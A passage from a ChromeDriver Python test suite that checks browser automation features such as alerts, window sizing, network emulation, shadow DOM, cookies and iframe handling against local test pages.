_ANDROID_PACKAGE_KEY: self.assertRaises(chromedriver.InvalidArgument, elem.SendKeys, "/blah/blah/blah") def testSendKeysToNonTypeableInputElement(self): self._driver.Load("about:blank") self._driver.ExecuteScript( "document.body.innerHTML = '<input type=\"color\">';") elem = self._driver.FindElement('tag name', 'input'); input_value = '#7fffd4' elem.SendKeys(input_value) value = elem.GetProperty('value') self.assertEquals(input_value, value) def testSendKeysNonBmp(self): self._driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/two_inputs.html')) elem = self._driver.FindElement('css selector', '#first') expected = u'T\U0001f4a9XL\u0436'.encode('utf-8') elem.SendKeys(expected) actual = elem.GetProperty('value').encode('utf-8') self.assertEquals(expected, actual) def testGetElementAttribute(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/attribute_colon_test.html')) elem = self._driver.FindElement("css selector", "*[name='phones']") self.assertEquals('3', elem.GetAttribute('size')) def testGetElementProperty(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/two_inputs.html')) elem = self._driver.FindElement("css selector", "#first") self.assertEquals('text', elem.GetProperty('type')) self.assertEquals('first', elem.GetProperty('id')) def testGetElementSpecialCharAttribute(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/attribute_colon_test.html')) elem = self._driver.FindElement("css selector", "*[name='phones']") self.assertEquals('colonvalue', elem.GetAttribute('ext:qtip')) def testGetCurrentUrl(self): url = self.GetHttpUrlForFile('/chromedriver/frame_test.html') self._driver.Load(url) self.assertEquals(url, self._driver.GetCurrentUrl()) self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe')) self.assertEquals(url, self._driver.GetCurrentUrl()) def testGoBackAndGoForward(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.GoBack() self._driver.GoForward() def testDontGoBackOrGoForward(self): # We need to run this test in a new tab so that it is isolated from previous # test runs. old_windows = self._driver.GetWindowHandles() self._driver.ExecuteScript('window.open("about:blank")') new_window = self.WaitForNewWindow(self._driver, old_windows) self._driver.SwitchToWindow(new_window) self.assertEquals('about:blank', self._driver.GetCurrentUrl()) self._driver.GoBack() self.assertEquals('about:blank', self._driver.GetCurrentUrl()) self._driver.GoForward() self.assertEquals('about:blank', self._driver.GetCurrentUrl()) def testBackNavigationAfterClickElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) link = self._driver.FindElement('css selector', '#l1') link.Click() self._driver.GoBack() self.assertNotEqual('data:,', self._driver.GetCurrentUrl()) self.assertEquals(self.GetHttpUrlForFile('/chromedriver/link_nav.html'), self._driver.GetCurrentUrl()) def testAlertHandlingOnPageUnload(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript('window.onbeforeunload=function(){return true}') self._driver.FindElement('tag name', 'body').Click() self._driver.GoBack() self.assertTrue(self._driver.IsAlertOpen()) self._driver.HandleAlert(True) self.assertFalse(self._driver.IsAlertOpen()) def testRefresh(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.Refresh() def testAlert(self): self.assertFalse(self._driver.IsAlertOpen()) self._driver.ExecuteScript('window.confirmed = confirm(\'HI\');') self.assertTrue(self._driver.IsAlertOpen()) self.assertEquals('HI', self._driver.GetAlertMessage()) self._driver.HandleAlert(False) self.assertFalse(self._driver.IsAlertOpen()) self.assertEquals(False, self._driver.ExecuteScript('return window.confirmed')) def testSendTextToAlert(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript('prompt = window.prompt()') self.assertTrue(self._driver.IsAlertOpen()) self._driver.HandleAlert(True, 'TextToPrompt') self.assertEquals('TextToPrompt', self._driver.ExecuteScript('return prompt')) self._driver.ExecuteScript('window.confirmed = confirm(\'HI\');') self.assertRaises(chromedriver.ElementNotInteractable, self._driver.HandleAlert, True, 'textToConfirm') self._driver.HandleAlert(True) #for closing the previous alert. self._driver.ExecuteScript('window.onbeforeunload=function(){return true}') self._driver.FindElement('tag name', 'body').Click() self._driver.Refresh() self.assertTrue(self._driver.IsAlertOpen()) self.assertRaises(chromedriver.UnsupportedOperation, self._driver.HandleAlert, True, 'textToOnBeforeUnload') def testAlertOnNewWindow(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) old_windows = self._driver.GetWindowHandles() self._driver.ExecuteScript("window.open('%s')" % self.GetHttpUrlForFile('/chromedriver/alert_onload.html')) new_window = self.WaitForNewWindow(self._driver, old_windows) self.assertNotEqual(None, new_window) self._driver.SwitchToWindow(new_window) self.assertTrue(self._driver.IsAlertOpen()) self._driver.HandleAlert(False) self.assertFalse(self._driver.IsAlertOpen()) def testShouldHandleNewWindowLoadingProperly(self): """Tests that ChromeDriver determines loading correctly for new windows.""" self._http_server.SetDataForPath( '/newwindow', """ <html> <body> <a href='%s' target='_blank'>new window/tab</a> </body> </html>""" % self._sync_server.GetUrl()) self._driver.Load(self._http_server.GetUrl() + '/newwindow') old_windows = self._driver.GetWindowHandles() self._driver.FindElement('tag name', 'a').Click() new_window = self.WaitForNewWindow(self._driver, old_windows) self.assertNotEqual(None, new_window) self.assertFalse(self._driver.IsLoading()) self._driver.SwitchToWindow(new_window) self.assertTrue(self._driver.IsLoading()) self._sync_server.RespondWithContent('<html>new window</html>') self._driver.ExecuteScript('return 1') # Shouldn't hang. def testPopups(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) old_handles = self._driver.GetWindowHandles() self._driver.ExecuteScript('window.open("about:blank")') new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) def testNoSuchFrame(self): self.assertRaises(chromedriver.NoSuchFrame, self._driver.SwitchToFrame, 'nosuchframe') self.assertRaises(chromedriver.NoSuchFrame, self._driver.SwitchToFrame, self._driver.FindElement('tag name', 'body')) def testWindowPosition(self): rect = self._driver.GetWindowRect() self._driver.SetWindowRect(None, None, rect[2], rect[3]) self.assertEquals(rect, self._driver.GetWindowRect()) # Resize so the window isn't moved offscreen. # See https://bugs.chromium.org/p/chromedriver/issues/detail?id=297. self._driver.SetWindowRect(640, 400, None, None) self._driver.SetWindowRect(None, None, 100, 200) self.assertEquals([640, 400, 100, 200], self._driver.GetWindowRect()) def testWindowSize(self): rect = self._driver.GetWindowRect() self._driver.SetWindowRect(rect[0], rect[1], None, None) self.assertEquals(rect, self._driver.GetWindowRect()) self._driver.SetWindowRect(640, 400, None, None) self.assertEquals([640, 400, rect[2], rect[3]], self._driver.GetWindowRect()) def testWindowRect(self): old_window_rect = self._driver.GetWindowRect() self._driver.SetWindowRect(*old_window_rect) self.assertEquals(self._driver.GetWindowRect(), old_window_rect) target_window_rect = [640, 400, 100, 200] target_window_rect_dict = {'width': 640, 'height': 400, 'x': 100, 'y': 200} returned_window_rect = self._driver.SetWindowRect(*target_window_rect) self.assertEquals(self._driver.GetWindowRect(), target_window_rect) self.assertEquals(returned_window_rect, target_window_rect_dict) def testWindowMaximize(self): old_rect_list = [640, 400, 100, 200] self._driver.SetWindowRect(*old_rect_list) new_rect = self._driver.MaximizeWindow() new_rect_list = [ new_rect['width'], new_rect['height'], new_rect['x'], new_rect['y'] ] self.assertNotEqual(old_rect_list, new_rect_list) self._driver.SetWindowRect(*old_rect_list) self.assertEquals(old_rect_list, self._driver.GetWindowRect()) def testWindowMinimize(self): handle_prefix = "CDwindow-" handle = self._driver.GetCurrentWindowHandle() target = handle[len(handle_prefix):] self._driver.SetWindowRect(640, 400, 100, 200) rect = self._driver.MinimizeWindow() expected_rect = {u'y': 200, u'width': 640, u'height': 400, u'x': 100} #check it returned the correct rect for key in expected_rect.keys(): self.assertEquals(expected_rect[key], rect[key]) # check its minimized res = self._driver.SendCommandAndGetResult('Browser.getWindowForTarget', {'targetId': target}) self.assertEquals('minimized', res['bounds']['windowState']) def testWindowFullScreen(self): old_rect_list = [640, 400, 100, 200] self._driver.SetWindowRect(*old_rect_list) self.assertEquals(self._driver.GetWindowRect(), old_rect_list) new_rect = self._driver.FullScreenWindow() new_rect_list = [ new_rect['width'], new_rect['height'], new_rect['x'], new_rect['y'] ] self.assertNotEqual(old_rect_list, new_rect_list) self._driver.SetWindowRect(*old_rect_list) for i in range(10): if old_rect_list == self._driver.GetWindowRect(): break time.sleep(0.1) self.assertEquals(old_rect_list, self._driver.GetWindowRect()) def testConsoleLogSources(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/console_log.html')) logs = self._driver.GetLog('browser') self.assertEqual('javascript', logs[0]['source']) self.assertTrue('TypeError' in logs[0]['message']) self.assertEqual('network', logs[1]['source']) self.assertTrue('nonexistent.png' in logs[1]['message']) self.assertTrue('404' in logs[1]['message']) # Sometimes, we also get an error for a missing favicon. if len(logs) > 2: self.assertEqual('network', logs[2]['source']) self.assertTrue('favicon.ico' in logs[2]['message']) self.assertTrue('404' in logs[2]['message']) self.assertEqual(3, len(logs)) else: self.assertEqual(2, len(logs)) def testPendingConsoleLog(self): new_logs = [""] def GetPendingLogs(driver): response = driver.GetLog('browser') new_logs[0] = [x for x in response if x['source'] == 'console-api'] return new_logs[0] self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/pending_console_log.html')) logs = self._driver.GetLog('browser') self.assertEqual('console-api', logs[0]['source']) self.assertTrue('"InitialError" 2018 "Third"' in logs[0]['message']) self.WaitForCondition(lambda: len(GetPendingLogs(self._driver)) > 0 , 6) self.assertEqual('console-api', new_logs[0][0]['source']) self.assertTrue('"RepeatedError" "Second" "Third"' in new_logs[0][0]['message']) def testGetLogOnClosedWindow(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() self.WaitForNewWindow(self._driver, old_handles) self._driver.CloseWindow() try: self._driver.GetLog('browser') except chromedriver.ChromeDriverException as e: self.fail('exception while calling GetLog on a closed tab: ' + e.message) def testGetLogOnWindowWithAlert(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript('alert("alert!");') try: self._driver.GetLog('browser') except Exception as e: self.fail(e.message) def testDoesntHangOnDebugger(self): self._driver.Load('about:blank') self._driver.ExecuteScript('debugger;') def testChromeDriverSendLargeData(self): script = 'return "0".repeat(10e6);' lots_of_data = self._driver.ExecuteScript(script) self.assertEquals('0'.zfill(int(10e6)), lots_of_data) def testEmulateNetworkConditions(self): # Network conditions must be set before it can be retrieved. self.assertRaises(chromedriver.UnknownError, self._driver.GetNetworkConditions) # DSL: 2Mbps throughput, 5ms RTT latency = 5 throughput = 2048 * 1024 self._driver.SetNetworkConditions(latency, throughput, throughput) network = self._driver.GetNetworkConditions() self.assertEquals(latency, network['latency']); self.assertEquals(throughput, network['download_throughput']); self.assertEquals(throughput, network['upload_throughput']); self.assertEquals(False, network['offline']); # Network Conditions again cannot be retrieved after they've been deleted. self._driver.DeleteNetworkConditions() self.assertRaises(chromedriver.UnknownError, self._driver.GetNetworkConditions) def testEmulateNetworkConditionsName(self): # DSL: 2Mbps throughput, 5ms RTT # latency = 5 # throughput = 2048 * 1024 self._driver.SetNetworkConditionsName('DSL') network = self._driver.GetNetworkConditions() self.assertEquals(5, network['latency']); self.assertEquals(2048*1024, network['download_throughput']); self.assertEquals(2048*1024, network['upload_throughput']); self.assertEquals(False, network['offline']); def testEmulateNetworkConditionsSpeed(self): # Warm up the browser. self._http_server.SetDataForPath( '/', "<html><body>blank</body></html>") self._driver.Load(self._http_server.GetUrl() + '/') # DSL: 2Mbps throughput, 5ms RTT latency = 5 throughput_kbps = 2048 throughput = throughput_kbps * 1024 self._driver.SetNetworkConditions(latency, throughput, throughput) _32_bytes = " 0 1 2 3 4 5 6 7 8 9 A B C D E F" _1_megabyte = _32_bytes * 32768 self._http_server.SetDataForPath( '/1MB', "<html><body>%s</body></html>" % _1_megabyte) start = monotonic() self._driver.Load(self._http_server.GetUrl() + '/1MB') finish = monotonic() duration = finish - start actual_throughput_kbps = 1024 / duration self.assertLessEqual(actual_throughput_kbps, throughput_kbps * 1.5) self.assertGreaterEqual(actual_throughput_kbps, throughput_kbps / 1.5) def testEmulateNetworkConditionsNameSpeed(self): # Warm up the browser. self._http_server.SetDataForPath( '/', "<html><body>blank</body></html>") self._driver.Load(self._http_server.GetUrl() + '/') # DSL: 2Mbps throughput, 5ms RTT throughput_kbps = 2048 throughput = throughput_kbps * 1024 self._driver.SetNetworkConditionsName('DSL') _32_bytes = " 0 1 2 3 4 5 6 7 8 9 A B C D E F" _1_megabyte = _32_bytes * 32768 self._http_server.SetDataForPath( '/1MB', "<html><body>%s</body></html>" % _1_megabyte) start = monotonic() self._driver.Load(self._http_server.GetUrl() + '/1MB') finish = monotonic() duration = finish - start actual_throughput_kbps = 1024 / duration self.assertLessEqual(actual_throughput_kbps, throughput_kbps * 1.5) self.assertGreaterEqual(actual_throughput_kbps, throughput_kbps / 1.5) def testEmulateNetworkConditionsOffline(self): # A workaround for crbug.com/177511; when setting offline, the throughputs # must be 0. self._driver.SetNetworkConditions(0, 0, 0, offline=True) self.assertRaises(chromedriver.ChromeDriverException, self._driver.Load, self.GetHttpUrlForFile('/chromedriver/page_test.html')) # The "X is not available" title is set after the page load event fires, so # we have to explicitly wait for this to change. We can't rely on the # navigation tracker to block the call to Load() above. self.WaitForCondition(lambda: 'is not available' in self._driver.GetTitle()) def testSendCommandAndGetResult(self): """Sends a custom command to the DevTools debugger and gets the result""" self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) params = {} document = self._driver.SendCommandAndGetResult('DOM.getDocument', params) self.assertTrue('root' in document) def _FindElementInShadowDom(self, css_selectors): """Find an element inside shadow DOM using CSS selectors. The last item in css_selectors identify the element to find. All preceding selectors identify the hierarchy of shadow hosts to traverse in order to reach the target shadow DOM.""" current = None for selector in css_selectors: if current is None: # First CSS selector, start from root DOM. current = self._driver else: # current is a shadow host selected previously. # Enter the corresponding shadow root. current = self._driver.ExecuteScript( 'return arguments[0].shadowRoot', current) current = current.FindElement('css selector', selector) return current def testShadowDomFindElement(self): """Checks that chromedriver can find elements in a shadow DOM.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) self.assertTrue(self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#textBox"])) def testShadowDomFindChildElement(self): """Checks that chromedriver can find child elements from a shadow DOM element.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#childDiv"]) self.assertTrue(elem.FindElement("css selector", "#textBox")) def testShadowDomFindElementFailsFromRoot(self): """Checks that chromedriver can't find elements in a shadow DOM from root.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) # can't find element from the root without /deep/ with self.assertRaises(chromedriver.NoSuchElement): self._driver.FindElement("css selector", "#textBox") def testShadowDomText(self): """Checks that chromedriver can find extract the text from a shadow DOM element.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#heading"]) self.assertEqual("Child", elem.GetText()) def testShadowDomSendKeys(self): """Checks that chromedriver can call SendKeys on a shadow DOM element.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#textBox"]) elem.SendKeys("bar") self.assertEqual("foobar", self._driver.ExecuteScript( 'return arguments[0].value;', elem)) def testShadowDomClear(self): """Checks that chromedriver can call Clear on a shadow DOM element.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#textBox"]) elem.Clear() self.assertEqual("", self._driver.ExecuteScript( 'return arguments[0].value;', elem)) def testShadowDomClick(self): """Checks that chromedriver can call Click on an element in a shadow DOM.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) # Wait for page to stabilize. See https://crbug.com/954553#c7 time.sleep(1) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#button"]) elem.Click() # the button's onClicked handler changes the text box's value self.assertEqual("Button Was Clicked", self._driver.ExecuteScript( 'return arguments[0].value;', self._FindElementInShadowDom(["#innerDiv", "#parentDiv", "#textBox"]))) def testShadowDomActionClick(self): '''Checks that ChromeDriver can use actions API to click on an element in a shadow DOM.''' self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) # Wait for page to stabilize. See https://crbug.com/954553#c7 time.sleep(1) elem = self._FindElementInShadowDom( ['#innerDiv', '#parentDiv', '#button']) actions = ({'actions': [{ 'type': 'pointer', 'actions': [{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerUp', 'button': 0}], 'id': 'pointer1'}]}) self._driver.PerformActions(actions) # the button's onClicked handler changes the text box's value self.assertEqual('Button Was Clicked', self._driver.ExecuteScript( 'return arguments[0].value;', self._FindElementInShadowDom(['#innerDiv', '#parentDiv', '#textBox']))) def testShadowDomStaleReference(self): """Checks that trying to manipulate shadow DOM elements that are detached from the document raises a StaleElementReference exception""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#button"]) self._driver.ExecuteScript( 'document.querySelector("#outerDiv").innerHTML="<div/>";') with self.assertRaises(chromedriver.StaleElementReference): elem.Click() def testTouchDownMoveUpElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/touch_action_tests.html')) target = self._driver.FindElement('css selector', '#target') location = target.GetLocation() self._driver.TouchDown(location['x'], location['y']) events = self._driver.FindElement('css selector', '#events') self.assertEquals('events: touchstart', events.GetText()) self._driver.TouchMove(location['x'] + 1, location['y'] + 1) self.assertEquals('events: touchstart touchmove', events.GetText()) self._driver.TouchUp(location['x'] + 1, location['y'] + 1) self.assertEquals('events: touchstart touchmove touchend', events.GetText()) def testGetElementRect(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/absolute_position_element.html')) target = self._driver.FindElement('css selector', '#target') rect = target.GetRect() self.assertEquals(18, rect['x']) self.assertEquals(10, rect['y']) self.assertEquals(200, rect['height']) self.assertEquals(210, rect['width']) def testTouchFlickElement(self): dx = 3 dy = 4 speed = 5 flickTouchEventsPerSecond = 30 moveEvents = int( math.sqrt(dx * dx + dy * dy) * flickTouchEventsPerSecond / speed) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) div = self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.addEventListener("touchstart", function() {' ' div.innerHTML = "preMove0";' '});' 'div.addEventListener("touchmove", function() {' ' res = div.innerHTML.match(/preMove(\d+)/);' ' if (res != null) {' ' div.innerHTML = "preMove" + (parseInt(res[1], 10) + 1);' ' }' '});' 'div.addEventListener("touchend", function() {' ' if (div.innerHTML == "preMove' + str(moveEvents) + '") {' ' div.innerHTML = "new<br>";' ' }' '});' 'return div;') self._driver.TouchFlick(div, dx, dy, speed) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testSwitchesToTopFrameAfterNavigation(self): self._driver.Load('about:blank') self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html')) p = self._driver.FindElement('tag name', 'p') self.assertEquals('Two', p.GetText()) def testSwitchesToTopFrameAfterRefresh(self): self._driver.Load('about:blank') self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self._driver.Refresh() p = self._driver.FindElement('tag name', 'p') self.assertEquals('Two', p.GetText()) def testSwitchesToTopFrameAfterGoingBack(self): self._driver.Load('about:blank') self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/inner.html')) self._driver.GoBack() p = self._driver.FindElement('tag name', 'p') self.assertEquals('Two', p.GetText()) def testCanSwitchToPrintPreviewDialog(self): old_handles = self._driver.GetWindowHandles() print("Test debug: actual len of old_handles: " + str(len(old_handles)), file = sys.stdout) self.assertEquals(1, len(old_handles)) self._driver.ExecuteScript('setTimeout(function(){window.print();}, 0);') new_window_handle = self.WaitForNewWindow(self._driver, old_handles) if new_window_handle is None: print("Test debug: new_window_handle is None", file = sys.stdout) else: print("Test debug: new_window_handle is not None", file = sys.stdout) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) print("Test debug: actual GetCurrentUrl: " + self._driver.GetCurrentUrl(), file = sys.stdout) self.assertEquals('chrome://print/', self._driver.GetCurrentUrl()) def testCanClickInIframes(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html')) a = self._driver.FindElement('tag name', 'a') a.Click() frame_url = self._driver.ExecuteScript('return window.location.href') self.assertTrue(frame_url.endswith('#one')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) a = self._driver.FindElement('tag name', 'a') a.Click() frame_url = self._driver.ExecuteScript('return window.location.href') self.assertTrue(frame_url.endswith('#two')) def testDoesntHangOnFragmentNavigation(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html#x')) def SetCookie(self, request): return {'Set-Cookie': 'x=y; HttpOnly'}, "<!DOCTYPE html><html></html>" def testGetHttpOnlyCookie(self): self._http_server.SetCallbackForPath('/setCookie', self.SetCookie) self._driver.Load(self.GetHttpUrlForFile('/setCookie')) self._driver.AddCookie({'name': 'a', 'value': 'b'}) cookies = self._driver.GetCookies() self.assertEquals(2, len(cookies)) for cookie in cookies: self.assertIn('name', cookie) if cookie['name'] == 'a': self.assertFalse(cookie['httpOnly']) elif cookie['name'] == 'x': self.assertTrue(cookie['httpOnly']) else: self.fail('unexpected cookie: %s' % json.dumps(cookie)) def testCookiePath(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/long_url/empty.html')) self._driver.AddCookie({'name': 'a', 'value': 'b'}) self._driver.AddCookie({ 'name': 'x', 'value': 'y', 'path': '/chromedriver/long_url'}) cookies = self._driver.GetCookies() self.assertEquals(2, len(cookies)) for cookie in cookies: self.assertIn('path', cookie) if cookie['name'] == 'a': self.assertEquals('/' , cookie['path']) if cookie['name'] == 'x': self.assertEquals('/chromedriver/long_url' , cookie['path']) def testGetNamedCookie(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) self._driver.AddCookie({'name': 'a', 'value': 'b'}) named_cookie = self._driver.GetNamedCookie('a') self.assertEquals('a' , named_cookie['name']) self.assertEquals('b' , named_cookie['value']) self.assertRaisesRegexp( chromedriver.NoSuchCookie, "no such cookie", self._driver.GetNamedCookie, 'foo') def testDeleteCookie(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) self._driver.AddCookie({'name': 'a', 'value': 'b'}) self._driver.AddCookie({'name': 'x', 'value': 'y'}) self._driver.AddCookie({'name': 'p', 'value': 'q'}) cookies = self._driver.GetCookies() self.assertEquals(3, len(cookies)) self._driver.DeleteCookie('a') self.assertEquals(2, len(self._driver.GetCookies())) self._driver.DeleteAllCookies() self.assertEquals(0, len(self._driver.GetCookies())) def testCookieForFrame(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/cross_domain_iframe.html')) self._driver.AddCookie({'name': 'outer', 'value': 'main context'}) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self.assertTrue(self.WaitForCondition( lambda: 'outer.html' in self._driver.ExecuteScript('return window.location.href'))) self._driver.AddCookie({'name': 'inner', 'value': 'frame context'}) cookies = self._driver.GetCookies() self.assertEquals(1, len(cookies)) self.assertEquals('inner', cookies[0]['name']) self._driver.SwitchToMainFrame() cookies = self._driver.GetCookies() self.assertEquals(1, len(cookies)) self.assertEquals('outer', cookies[0]['name']) def testCanClickAlertInIframes(self): # This test requires that the page be loaded from a file:// URI, rather than # the test HTTP server. path = os.path.join(chrome_paths.GetTestData(), 'chromedriver', 'page_with_frame.html') url = 'file://' + six.moves.urllib.request.pathname2url(path) self._driver.Load(url) frame = self._driver.FindElement('css selector', '#frm') self._driver.SwitchToFrame(frame) a = self._driver.FindElement('css selector', '#btn') a.Click() self.WaitForCondition(lambda: self._driver.IsAlertOpen()) self._driver.HandleAlert(True) def testThrowErrorWithExecuteScript(self): self.assertRaisesRegexp( chromedriver.JavaScriptError, "some error", self._driver.ExecuteScript, 'throw new Error("some error")') def testDoesntCrashWhenScriptLogsUndefinedValue(self): # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1547 self._driver.ExecuteScript('var b; console.log(b);') def testDoesntThrowWhenPageLogsUndefinedValue(self): # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1547 self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/log_undefined_value.html')) def testCanSetCheckboxWithSpaceKey(self): self._driver.Load('about:blank') self._driver.ExecuteScript( "document.body.innerHTML = '<input type=\"checkbox\">';") checkbox = self._driver.FindElement('tag name', 'input') self.assertFalse( self._driver.ExecuteScript('return arguments[0].checked', checkbox)) checkbox.SendKeys(' ') self.assertTrue( self._driver.ExecuteScript('return arguments[0].checked', checkbox)) def testElementReference(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/element_ref.html')) element = self._driver.FindElement('css selector', '#link') self._driver.FindElements('tag name', 'br') w3c_id_length = 36 if (self._driver.w3c_compliant): self.assertEquals(len(element._id), w3c_id_length) def testFindElementWhenElementIsOverridden(self): self._driver.Load('about:blank') self._driver.ExecuteScript( 'document.body.appendChild(document.createElement("a"));') self._driver.ExecuteScript('window.Element = {}') self.assertEquals(1, len(self._driver.FindElements('tag name', 'a'))) def testExecuteScriptWhenObjectPrototypeIsModified(self): # Some JavaScript libraries (e.g. MooTools) do things like this. For context # see https://bugs.chromium.org/p/chromedriver/issues/detail?id=1521 self._driver.Load('about:blank') self._driver.ExecuteScript('Object.prototype.$family = undefined;') self.assertEquals(1, self._driver.ExecuteScript('return 1;')) def testWebWorkerFrames(self): """Verify web worker frames are handled correctly. Regression test for bug https://bugs.chromium.org/p/chromedriver/issues/detail?id=2340. The bug was triggered by opening a page with web worker, and then opening a page on a different site. We simulate a different site by using 'localhost' as the host name (default is '127.0.0.1'). """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/web_worker.html')) self._driver.Load(self._http_server.GetUrl('localhost') + '/chromedriver/empty.html') def testWaitForCurrentFrameToLoad(self): """Verify ChromeDriver waits for loading events of current frame Regression test for bug https://bugs.chromium.org/p/chromedriver/issues/detail?id=3164 Clicking element in frame triggers reload of that frame, click should not return until loading is complete. """ def waitAndRespond(): # test may not detect regression without small sleep. # locally, .2 didn't fail before code change, .3 did time.sleep(.5) self._sync_server.RespondWithContent( """ <html> <body> <p id='valueToRead'>11</p> </body> </html> """) self._http_server.SetDataForPath('/page10.html', """ <html> <head> <title> Frame </title> <script> function reloadWith(i) { window.location.assign('%s'); } </script> </head> <body> <button id='prev' onclick="reloadWith(9)">-1</button> <button id='next' onclick="reloadWith(11)">+1</button> <p id='valueToRead'>10</p> </body> </html> """ % self._sync_server.GetUrl()) self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/page_for_next_iframe.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame); thread = threading.Thread(target=waitAndRespond) thread.start() self._driver.FindElement('css selector', '#next').Click() value_display = self._driver.FindElement('css selector', '#valueToRead') self.assertEquals('11', value_display.GetText()) def testSlowIFrame(self): """Verify ChromeDriver does not wait for slow frames to load. Regression test for bugs https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198 and https://bugs.chromium.org/p/chromedriver/issues/detail?id=2350. """ def waitAndRespond(): # Send iframe contents slowly time.sleep(2) self._sync_server.RespondWithContent( '<html><div id=iframediv>IFrame contents</div></html>') self._http_server.SetDataForPath('/top.html', """ <html><body> <div id='top'> <input id='button' type="button" onclick="run()" value='Click'> </div> <script> function run() { var iframe = document.createElement('iframe'); iframe.id = 'iframe'; iframe.setAttribute('src', '%s'); document.body.appendChild(iframe); } </script> </body></html>""" % self._sync_server.GetUrl()) self._driver.Load(self._http_server.GetUrl() + '/top.html') thread = threading.Thread(target=waitAndRespond) thread.start() start = monotonic() # Click should not wait for frame to load, so elapsed time from this # command should be < 2 seconds. self._driver.FindElement('css selector', '#button').Click() self.assertLess(monotonic() - start, 2.0) frame = self._driver.FindElement('css selector', '#iframe') # WaitForPendingNavigations examines the load state of the current frame # so ChromeDriver will wait for frame to load after SwitchToFrame # start is reused because that began the pause for the frame load self._driver.SwitchToFrame(frame) self.assertGreaterEqual(monotonic() - start, 2.0) self._driver.FindElement('css selector', '#iframediv') thread.join() @staticmethod def MakeRedImageTestScript(png_data_in_base64): """Used by the takeElementScreenshot* tests to load the PNG image via a data URI, analyze it, and PASS/FAIL depending on whether all the pixels are all rgb(255,0,0).""" return ( """ const resolve = arguments[arguments.length - 1]; const image = new Image(); image.onload = () => { var canvas = document.createElement('canvas'); canvas.width = image.width; canvas.height = image.height; var context = canvas.getContext('2d'); context.drawImage(image, 0, 0); const pixels = context.getImageData(0, 0, image.width, image.height).data; for (let i = 0; i < pixels.length; i += 4) { if (pixels[i + 0] != 255 || // Red pixels[i + 1] != 0 || // Green 